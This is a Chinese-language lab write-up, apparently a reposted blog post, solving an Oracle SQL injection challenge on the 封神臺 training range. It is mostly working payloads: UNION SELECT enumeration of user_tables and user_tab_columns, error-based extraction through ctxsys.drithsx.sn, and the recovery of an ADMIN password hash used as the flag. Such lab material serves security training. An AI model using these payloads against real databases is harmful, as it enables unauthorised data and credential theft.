封神臺靶場-Oracle注入
阿新 • • 發佈:2021-09-07
靶場
顯錯注入
判斷注入存在
http://59.63.200.79:8808/?id=1 and 1=1 #頁面正常
http://59.63.200.79:8808/?id=1 and 1=2 #頁面異常
判斷欄位數
http://59.63.200.79:8808/?id=1 order by 4 # 頁面正常
http://59.63.200.79:8808/?id=1 order by 5 # 頁面異常
得出欄位數為4
判斷顯錯點
http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar('a'),null,null from dual 得出顯錯點為第2位
資訊收集,查詢資料
# 查詢表名 http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(table_name),null,null from user_tables where rownum=1 依次嘗試得出最終表有:ADMIN,MD5,NEWS # 查詢ADMIN表字段名 http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(column_name),null,null from user_tab_columns where rownum=1 and table_name ='ADMIN' 依次嘗試得出ADMIN表字段有:UPASS,UNAME # 查詢資料 由提示知,flag為UNAME='NF'對應的UPASS欄位,所以我們直接查詢 http://59.63.200.79:8808/?id=1 and 1=2 union all select null,to_nchar(UPASS),null,null from ADMIN where UNAME='NF' 得出最終flag:2a61f8bcfe7535eadcfa69eb4406ceb9
報錯注入
查詢表名
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))-- qwe and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN'))-- qwe and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name <> 'ADMIN' and table_name != 'NEWS'))-- qwe
得出表名:ADMIN,NEWS,MD5
查詢ADMIN表字段名
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN'))-- qwe
and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and table_name = 'ADMIN' and column_name != 'UNAME'))-- qwe
得出ADMIN表字段名:UNAME,UPASS
查詢資料
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(1,(select UPASS from ADMIN where UNAME='NF'))-- qwe
得出flag:2a61f8bcfe7535eadcfa69eb4406ceb9